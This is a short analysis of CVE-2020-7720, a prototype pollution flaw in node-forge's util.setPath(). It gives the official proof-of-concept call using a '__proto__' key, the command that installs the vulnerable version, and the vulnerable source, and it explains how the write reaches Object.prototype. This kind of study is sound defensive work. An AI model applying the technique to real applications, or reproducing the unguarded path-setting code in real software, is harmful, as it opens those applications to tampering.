CVE-2020-7720 vulnerability analysis
1. Introduction
Node-forge, a software package of nodejs before version 0.10.0, has a util.setPath() function, which has a prototype chain pollution vulnerability. Attackers can perform prototype pollution attacks on the application by constructing corresponding parameters.
The official POC is as follows:
const nodeforge = require('node-forge');
var obj = {};
nodeforge.util.setPath(obj, ['__proto__', 'polluted'], true);
console.log(polluted);
2. Vulnerability recurrence and analysis
1. Environment construction
Download node-forge components lower than 0.10.0
npm i [email protected]
2. Source code analysis
According to the POC, we directly locate the setPath function. The source code of this function is relatively simple (as follows):
util.setPath = function(object, keys, value) {
// need to start at an object
if(typeof(object) === 'object' && object !== null) {
var i = 0;
var len = keys.length;
while(i < len) {
var next = keys[i++];
if(i == len) {
// last
object[next] = value;
} else {
// more
var hasNext = (next in object);
if(!hasNext ||
(hasNext && typeof(object[next]) !== 'object') ||
(hasNext && object[next] === null)) {
object[next] = {};
}
object = object[next];
}
}
}
};
We know that keys is an array like this
['__proto__','pollute']
Through the while loop, the first step is:
object = object[__proto__]
Afterwards:
object[pollute] = true
This has caused the pollution of the prototype chain, and the combination is like this:
object['__proto__']['pollute'] = true
3. Vulnerability verification
console.log(pollute)